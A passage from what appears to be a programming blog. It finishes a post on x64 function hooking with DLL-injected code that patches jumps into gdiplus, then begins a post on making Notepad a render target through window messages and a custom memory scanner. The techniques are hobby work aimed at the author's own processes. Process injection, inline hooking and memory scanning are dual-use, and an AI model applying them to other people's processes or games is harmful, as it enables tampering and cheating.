<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span> <span class="o">+</span> <span class="n">trampolineSize</span><span class="p">;</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunc</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//install the hook</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">int32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span>
<span class="c1">//returns the first module called "name" -> only searches for dll name, not whole path</span>
<span class="c1">//ie: somepath/subdir/mydll.dll can be searched for with "mydll.dll"</span>
<span class="n">HMODULE</span> <span class="nf">FindModuleInProcess</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">lowerCaseName</span> <span class="o">=</span> <span class="n">_strdup</span><span class="p">(</span><span class="n">name</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">name</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="n">success</span> <span class="o">=</span> <span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">success</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error enumerating modules on target process. Error Code %lu </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="n">DebugBreak</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">CHAR</span> <span class="n">remoteProcessName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> <span class="c1">//a null module handle gets the process name</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">MODULEINFO</span> <span class="n">remoteProcessModuleInfo</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">rebasedPath</span><span class="p">[</span><span class="mi">256</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">lastSlash</span> <span class="o">=</span> <span class="n">strrchr</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="sc">'\\'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">lastSlash</span><span class="p">)</span> <span class="n">lastSlash</span> <span class="o">=</span> <span class="n">strrchr</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="sc">'/'</span><span class="p">);</span>
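<span class="kt">char</span><span class="o">*</span> <span class="n">dllName</span> <span class="o">=</span> <span class="n">lastSlash</span> <span class="o">?</span> <span class="n">lastSlash</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">:</span> <span class="n">moduleName</span><span class="p">;</span> <span class="c1">//fall back to the whole string if there's no path separator</span>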
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">dllName</span><span class="p">,</span> <span class="n">lowerCaseName</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">success</span> <span class="o">=</span> <span class="n">GetModuleInformation</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="o">&</span><span class="n">remoteProcessModuleInfo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">MODULEINFO</span><span class="p">));</span>
<span class="n">free</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">);</span>
<span class="k">return</span> <span class="n">remoteProcessModule</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//the following string operations are to account for cases where GetModuleFileNameEx</span>
<span class="c1">//returns a relative path rather than an absolute one, or where the path we get to the module</span>
<span class="c1">//is using a virtual drive letter (ie: one created by subst) rather than a real drive</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">free</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">gdiPlusModule</span> <span class="o">=</span> <span class="n">FindModuleInProcess</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span> <span class="s">"gdiplus.dll"</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">localHookFunc4</span> <span class="o">=</span> <span class="n">GetProcAddress</span><span class="p">(</span><span class="n">gdiPlusModule</span><span class="p">,</span> <span class="p">(</span><span class="s">"GdipSetSolidFillColor"</span><span class="p">));</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">localHookFunc4</span><span class="p">,</span> <span class="n">GdipSetSolidFillColorPayload</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">**</span><span class="p">)</span><span class="o">&</span><span class="n">GdipSetSolidFillColorTrampoline</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
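<p>The displacement fix-up that <code>RelocateInstruction</code> does in the listing above is easier to see in isolation. Here’s a minimal sketch of just the 4 byte case. The helper names <code>RelocateDisp32</code> and <code>PatchDisp32</code> are made up for this example and aren’t part of the project, and the range check is an addition that the listing doesn’t have.</p>

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Hypothetical helper (not from the project): work out the displacement that
// reaches the same absolute target after an instruction moves from srcAddr
// to dstAddr. Returns false if the result no longer fits in 32 bits.
bool RelocateDisp32(uint64_t srcAddr, uint64_t dstAddr, int32_t oldDisp, int32_t* newDisp)
{
    assert(newDisp != nullptr);
    // target = srcAddr + instrSize + oldDisp = dstAddr + instrSize + newDisp
    // so newDisp = oldDisp - (dstAddr - srcAddr); the instruction size cancels out
    int64_t delta = int64_t(dstAddr - srcAddr);
    int64_t relocated = int64_t(oldDisp) - delta;
    if (relocated < INT32_MIN || relocated > INT32_MAX) return false;
    *newDisp = int32_t(relocated);
    return true;
}

// Hypothetical helper: patch the 4 displacement bytes of a copied instruction in place
bool PatchDisp32(uint8_t* instrBytes, uint8_t dispOffset, uint64_t srcAddr, uint64_t dstAddr)
{
    int32_t disp;
    std::memcpy(&disp, instrBytes + dispOffset, sizeof(disp));
    int32_t fixedDisp;
    if (!RelocateDisp32(srcAddr, dstAddr, disp, &fixedDisp)) return false;
    std::memcpy(instrBytes + dispOffset, &fixedDisp, sizeof(fixedDisp));
    return true;
}
```

<p>For example, moving <code>lea rcx,[rip+0x1000]</code> to an address 0x800 bytes lower means the displacement has to grow by 0x800 to keep pointing at the same place. The failure case is the reason trampoline memory gets allocated near the hooked function: if the copy ends up too far away, no 32 bit displacement can reach the original target.</p>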
<h2 id="where-to-go-next">Where to Go Next</h2>
<p>Despite being by far the longest post I’ve written to date, this rabbit hole goes a whole lot deeper than what I’ve written about here.</p>
<p>First of all, there are significant issues with the code written in this post:</p>
<ul>
<li>There’s no way to uninstall hooks</li>
<li>Hooking 32 bit applications isn’t supported at all</li>
<li>Everything breaks if 2 hooked functions share a payload</li>
<li>Stuff also breaks if a thread is executing instructions while they’re being stolen</li>
<li>More stuff breaks if the stolen instructions for a function use the r10 register</li>
<li>There are at least 3 additional scary problems I don’t know about yet</li>
</ul>
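<p>To give a feel for what fixing the first item might involve, here’s a rough sketch of the bookkeeping an uninstall needs: remember the bytes that the jump overwrites, and copy them back later. <code>HookRecord</code>, <code>InstallJmp</code> and <code>UninstallJmp</code> are hypothetical names invented for this example, and it works on a plain byte buffer. A real version would also have to make the page writable, restore any other bytes that were modified while stealing instructions, and make sure no thread is still running inside the trampoline.</p>

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Hypothetical bookkeeping struct (not part of the project's code)
struct HookRecord
{
    uint8_t* target;           // first byte of the hooked function
    uint8_t  originalBytes[5]; // what was there before the jmp was written
    bool     installed;
};

// Save the 5 bytes that are about to be clobbered, then write a relative jmp
void InstallJmp(HookRecord* rec, uint8_t* target, int32_t relAddr)
{
    assert(rec != nullptr && target != nullptr);
    rec->target = target;
    std::memcpy(rec->originalBytes, target, sizeof(rec->originalBytes));

    uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
    std::memcpy(jmpInstruction + 1, &relAddr, 4);
    std::memcpy(target, jmpInstruction, sizeof(jmpInstruction));
    rec->installed = true;
}

// Put the saved bytes back; safe to call on a record that isn't installed
void UninstallJmp(HookRecord* rec)
{
    assert(rec != nullptr);
    if (!rec->installed) return;
    std::memcpy(rec->target, rec->originalBytes, sizeof(rec->originalBytes));
    rec->installed = false;
}
```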
<p>I solve some of these problems (at least in a “good enough” sorta way) in my <a href="https://github.com/khalladay/hooking-by-example">hooking-by-example</a> repo, but others are left, I suppose, as an exercise for the reader. If you want to learn more, the sources for <a href="https://github.com/microsoft/Detours">Detours</a>, <a href="https://github.com/TsudaKageyu/minhook">Minhook</a>, <a href="https://easyhook.github.io/">Easyhook</a> and <a href="https://github.com/stevemk14ebr/PolyHook">Polyhook</a> might be of interest. I found the Polyhook code the easiest to read, for whatever that’s worth.</p>
<p>There are also some really cool approaches to function hooking that don’t require you to know the function signature of what you’re hooking. I haven’t delved into this at all, but I’ve had <a href="https://github.com/vovkos/protolesshooks">this github repo</a> starred for a while now.</p>
<p>Lastly, there’s a whole world of other hooking techniques out there. One that seems particularly interesting to me is import address table hooking, which <a href="https://renderdoc.org/">RenderDoc</a> uses. I expect I’ll lose several weekends to this very soon.</p>
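<p>The core idea behind import address table hooking is that calls to imported functions go through a table of pointers, so swapping one pointer redirects every call made through it without touching any instructions. The sketch below is a deliberately simplified model of that idea. <code>FakeImportEntry</code>, <code>g_fakeImports</code> and the other names are all made up for illustration, and it doesn’t parse a real PE import table or reflect how RenderDoc implements it.</p>

```cpp
#include <cassert>
#include <cstring>

typedef int (*AddFn)(int, int);

static int RealAdd(int a, int b) { return a + b; }

// Stand-in for an import address table: a name and the pointer that callers jump through
struct FakeImportEntry
{
    const char* name;
    AddFn address;
};

static FakeImportEntry g_fakeImports[] = {
    { "RealAdd", RealAdd },
};

// Swap the table entry called "name" and return the pointer that used to be there
// (returns nullptr if no entry has that name)
AddFn HookFakeImport(const char* name, AddFn replacement)
{
    assert(name != nullptr);
    for (FakeImportEntry& entry : g_fakeImports)
    {
        if (std::strcmp(entry.name, name) == 0)
        {
            AddFn original = entry.address;
            entry.address = replacement;
            return original;
        }
    }
    return nullptr;
}

// Callers always go through the table, like code calling an imported function does
int CallAddThroughTable(int a, int b)
{
    return g_fakeImports[0].address(a, b);
}

// The payload can still reach the real function through the saved pointer
static AddFn g_originalAdd = nullptr;
static int AddPayload(int a, int b) { return g_originalAdd(a, b) + 100; }
```

<p>Note that there’s no trampoline and no instruction relocation here: the old table entry already is a usable pointer to the original function. The trade-off is that only calls that go through the table are intercepted.</p>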
<h2 id="final-thoughts">Final Thoughts</h2>
<p>I’ve written a lot already, so I’ll keep my sign-off short. There are two things I didn’t find room for in the ocean of text above that I think are worth mentioning:</p>
<ol>
<li>If you try to disassemble a function that you have breakpoints set in, you’re going to have a bad time.</li>
<li>To debug an injected dll, attach your debugger to the process the dll was injected into.</li>
</ol>
<p>Finally, my twitter handle is <a href="https://twitter.com/khalladay">@khalladay</a>. Send me questions or comments or whatever there. I’ll probably respond, unless I’m tired that day and forget to come back to it later.</p>
Ray Tracing In Notepad.exe At 30 FPS
2020-05-20T00:00:00+00:00
http://kylehalladay.com/blog/2020/05/20/Rendering-With-Notepad
<p>A few months back, there was a post on Reddit (<a href="https://www.reddit.com/r/gamedev/comments/f1oidu/how_i_made_a_game_played_in_notepad/">link</a>), which described a game that used an open source clone of Notepad to handle all its input and rendering. While reading about it, I had the thought that it would be really cool to see something similar that worked with stock Windows Notepad. Then I spent way too much of my free time doing exactly that.</p>
<p>I ended up making a Snake game and a small ray tracer that use stock Notepad for all input and rendering tasks, and got to learn about DLL Injection, API Hooking and Memory Scanning along the way. It seemed like writing up the stuff I learned might make for an interesting read, and give me a chance to show off the dumb stuff I built at the same time, so that’s what these next couple blog posts will be about.</p>
<p>Due to length, I’ve split the writeup into two blog posts. This first post will talk about how Memory Scanners work, and how I used one to turn notepad.exe into a 30+ fps capable render target. I’ll also talk about the ray tracer that I built that rendered into Notepad.</p>
<p>The <a href="/blog/2020/05/20/Hooking-Input-Snake-In-Notepad.html">second post</a> will talk about using Windows hooks to capture input, and share the Snake game I built that uses pretty much all the stuff described in both of these posts.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/rt2.gif" />
<font size="2">This post will cover how I made Notepad do this</font>
<br /><br />
</div>
<p>If you just want to see the code, the whole project (including both the ray tracer and snake game) is up <a href="https://github.com/khalladay/render-with-notepad">on github</a>.</p>
<h2 id="sending-key-events-to-notepad">Sending Key Events To Notepad</h2>
<p>The obvious place to kick all of this off is to talk about sending key events to a running instance of Notepad. This was the boring part of the project so I’ll be brief.</p>
<p>If you’ve never built an app out of Win32 controls (like I hadn’t), you might be surprised to learn that every UI element, from a menu bar to a button, is technically its own “window,” and sending key input to a program involves sending that input to the UI element you want to receive it. Luckily Visual Studio comes with a tool called <a href="https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-start-spy-increment?view=vs-2019">Spy++</a> that can list all the windows that make up a given application.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/spy.PNG" />
<font size="2">The windows listed for Notepad in Spy++</font>
<br /><br />
</div>
<p>Spy++ revealed that the Notepad child window I was after was the “Edit” window. Once I knew that, it was just a matter of figuring out the right mix of Win32 function calls to get an HWND for that UI element, and then sending key inputs there. Getting that HWND looked something like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">HWND</span> <span class="nf">GetWindowForProcessAndClassName</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">pid</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">className</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HWND</span> <span class="n">curWnd</span> <span class="o">=</span> <span class="n">GetTopWindow</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="c1">//0 arg means to get the window at the top of the Z order</span>
<span class="kt">char</span> <span class="n">classNameBuf</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="k">while</span> <span class="p">(</span><span class="n">curWnd</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">){</span>
<span class="n">DWORD</span> <span class="n">curPid</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">dwThreadId</span> <span class="o">=</span> <span class="n">GetWindowThreadProcessId</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="o">&</span><span class="n">curPid</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">curPid</span> <span class="o">==</span> <span class="n">pid</span><span class="p">){</span>
<span class="n">GetClassName</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="n">classNameBuf</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">className</span><span class="p">,</span> <span class="n">classNameBuf</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="k">return</span> <span class="n">curWnd</span><span class="p">;</span>
<span class="n">HWND</span> <span class="n">childWindow</span> <span class="o">=</span> <span class="n">FindWindowEx</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">className</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">childWindow</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="k">return</span> <span class="n">childWindow</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">curWnd</span> <span class="o">=</span> <span class="n">GetNextWindow</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="n">GW_HWNDNEXT</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Once I had the HWND for the right control, drawing a character in Notepad’s edit control was just a matter of using <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-postmessagea">PostMessage</a> to send a WM_CHAR event to it.</p>
<p>Note that if you want to use Spy++ yourself, you probably want to use the 64 bit version of it, which is inexplicably <em>not</em> the version that Visual Studio 2019 launches by default. Instead you’ll need to search your Visual Studio Program files for “spyxx_amd64.exe.”</p>
<p>It took about 10 seconds after getting this working to realize that even if I could find a non-janky way to use window messages to draw full game screens into Notepad, it would be way too slow to even come close to approaching a 30hz refresh cycle. It was also really boring, so I didn’t spend too long looking for ways to make it go any faster.</p>
<h2 id="cheatengine-for-good-guys">CheatEngine For Good Guys</h2>
<p>While getting the fake key input set up, I was reminded of <a href="https://www.cheatengine.org/">CheatEngine</a>. It’s a program that lets users find and modify memory in processes running on their machines. Most of the time it’s used by people trying to cheat at games or do other stuff that makes game devs sad, but it turns out it can also be a force for good.</p>
<p>Memory Scanners like CheatEngine work by finding all the memory addresses in a target process which contain a specific value. Let’s say you’re playing a game and you want to give yourself more health, you could follow a process that looks like this:</p>
<ul>
<li>Use a memory scanner to find all addresses in the game’s memory that store the value of your health (let’s say 100).</li>
<li>Do something in game to modify your health to a new value (like 92).</li>
<li>Search all the addresses you found previously (that stored 100) to find ones that now store 92.</li>
<li>Repeat this process until you have a single memory address (which most likely is where your health is stored)</li>
<li>Modify the value at that address</li>
</ul>
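<p>As a rough sketch of that narrowing loop (not CheatEngine’s actual implementation), the two helpers below run against a plain local array that stands in for the game’s memory. The names <code>scan_initial</code> and <code>scan_narrow</code> are made up for illustration, and a real scanner would have to read another process’ memory rather than index an array directly.</p>

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: first pass of a value scan. Records the index of every
   32-bit slot in `mem` that currently equals `value`. Returns the number of
   candidates recorded (capped at `maxOut`). */
size_t scan_initial(const int32_t* mem, size_t slots, int32_t value,
                    size_t* out, size_t maxOut)
{
    size_t found = 0;
    for (size_t i = 0; i < slots && found < maxOut; ++i) {
        if (mem[i] == value) out[found++] = i;
    }
    return found;
}

/* Hypothetical helper: later passes. Keeps only the candidates whose slot now
   holds `newValue`, compacting the list in place. Returns the new count. */
size_t scan_narrow(const int32_t* mem, size_t* candidates, size_t count,
                   int32_t newValue)
{
    size_t kept = 0;
    for (size_t i = 0; i < count; ++i) {
        if (mem[candidates[i]] == newValue) candidates[kept++] = candidates[i];
    }
    return kept;
}
```

<p>Calling <code>scan_initial</code> once and then <code>scan_narrow</code> after each in-game change shrinks the candidate list until, ideally, one address is left.</p>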
<div align="center">
<img src="/images/post_images/2020-05-20/cheatengine.PNG" />
<font size="2">CheatEngine and Notepad, friends at last</font>
<br /><br />
</div>
<p>This is pretty much what I did, except instead of a health value, I searched for memory that stored the string of text currently displayed in Notepad. After some trial and error, I was able to use CheatEngine to find (and change) the text being displayed. I also learned three important bits of info about Notepad:</p>
<ul>
<li>Notepad’s edit window stores on screen text in UTF-16, even if the bottom right part of the window says your file is UTF-8</li>
<li>If I kept deleting and retyping the same string, CheatEngine would start finding multiple copies of this data in memory (possibly the undo buffer?)</li>
<li>I couldn’t replace the displayed text with a longer string, meaning that Notepad wasn’t preallocating a text buffer up front</li>
</ul>
<h2 id="building-a-memory-scanner">Building A Memory Scanner</h2>
<p>Despite not being able to modify the length of the text buffer, this seemed promising enough that I decided to write my own small memory scanner to embed in my project.</p>
<p>I couldn’t find a lot of information about building memory scanners, but I did find a great <a href="https://nullprogram.com/blog/2016/09/03/">blog post</a> by Chris Wellons that talks about (and links to) a memory scanner that he wrote for his own cheat tool. Using that blog post and the bit of experience I had with CheatEngine, I was able to piece together that the basic algorithm for a memory scanner looks something like this:</p>
<pre>
FOR EACH block of memory allocated by our target process
IF that block is committed and read/write enabled
Scan the contents of that block for our byte pattern
IF WE FIND IT
return that address
</pre>
<p>My whole memory scanner implementation only ended up being ~40 lines of code, so I’m just going to walk through all of it.</p>
<h3 id="iterating-over-a-process-memory">Iterating Over A Process’ Memory</h3>
<p>The first thing a memory scanner needs to be able to do is iterate over a process’ allocated memory.</p>
<p>Since the range of virtual memory for every 64 bit process on Windows is the same (0x000000000000 through 0x7FFFFFFFFFFF), I started by making a pointer to address 0 and used <a href="https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualqueryex">VirtualQueryEx</a> to get information about that virtual address for my target program.</p>
<p>VirtualQueryEx groups contiguous pages that have identical memory attributes into MEMORY_BASIC_INFORMATION structs, so it’s likely that the struct returned by VirtualQueryEx for a given address contains information about more than 1 page. The returned MEMORY_BASIC_INFORMATION stores this shared set of memory attributes, along with the address of the start of its span of pages, and the size of the whole span.</p>
<p>Once I had the first MEMORY_BASIC_INFORMATION struct, iterating through memory was just a matter of adding the current struct’s BaseAddress and RegionSize members together, and feeding the new address to VirtualQueryEx to get the next set of contiguous pages.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">char</span><span class="o">*</span> <span class="nf">FindBytePatternInProcessMemory</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pattern</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">patternLen</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">basePtr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
<span class="n">MEMORY_BASIC_INFORMATION</span> <span class="n">memInfo</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">VirtualQueryEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">basePtr</span><span class="p">,</span> <span class="o">&</span><span class="n">memInfo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">MEMORY_BASIC_INFORMATION</span><span class="p">)))</span>
<span class="p">{</span>
<span class="k">const</span> <span class="n">DWORD</span> <span class="n">mem_commit</span> <span class="o">=</span> <span class="mh">0x1000</span><span class="p">;</span>
<span class="k">const</span> <span class="n">DWORD</span> <span class="n">page_readwrite</span> <span class="o">=</span> <span class="mh">0x04</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">memInfo</span><span class="p">.</span><span class="n">State</span> <span class="o">==</span> <span class="n">mem_commit</span> <span class="o">&&</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">Protect</span> <span class="o">==</span> <span class="n">page_readwrite</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// search this memory for our pattern</span>
<span class="p">}</span>
<span class="n">basePtr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">memInfo</span><span class="p">.</span><span class="n">BaseAddress</span> <span class="o">+</span> <span class="n">memInfo</span><span class="p">.</span><span class="n">RegionSize</span><span class="p">;</span>
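<span class="p">}</span>
<span class="k">return</span> <span class="n">nullptr</span><span class="p">;</span> <span class="c1">//no match found in any region</span>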
<span class="p">}</span></code></pre></figure>
<p>The code above skips ahead a bit and also determines if a set of pages has been committed and is read/write enabled, by examining the .State and .Protect struct members. You can find all the possible values for these vars in the documentation for <a href="https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-memory_basic_information">MEMORY_BASIC_INFORMATION</a>, but the values that my scanner cared about were a state of 0x1000 (MEM_COMMIT) and a protection level of 0x04 (PAGE_READWRITE).</p>
<h3 id="searching-a-process-memory-for-a-byte-pattern">Searching A Process’ Memory For a Byte Pattern</h3>
<p>It’s not possible to read data in a different process’ address space directly (or at least, I didn’t stumble on how to do it). Instead, I first needed to copy the contents of a page range to the memory scanner’s address space. I did this with <a href="https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-readprocessmemory">ReadProcessMemory</a>.</p>
<p>Once the memory was copied to a locally visible buffer, searching it for a byte pattern was easy enough. To make things simpler, I ignored the possibility that there could be multiple copies of the target byte pattern in memory in my first scanner implementation. I ended up coming up with a hacky workaround for this problem later on that saved me from ever having to actually address it in my scanner logic.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">char</span><span class="o">*</span> <span class="nf">FindPattern</span><span class="p">(</span><span class="kt">char</span><span class="o">*</span> <span class="n">src</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">srcLen</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pattern</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">patternLen</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">cur</span> <span class="o">=</span> <span class="n">src</span><span class="p">;</span>
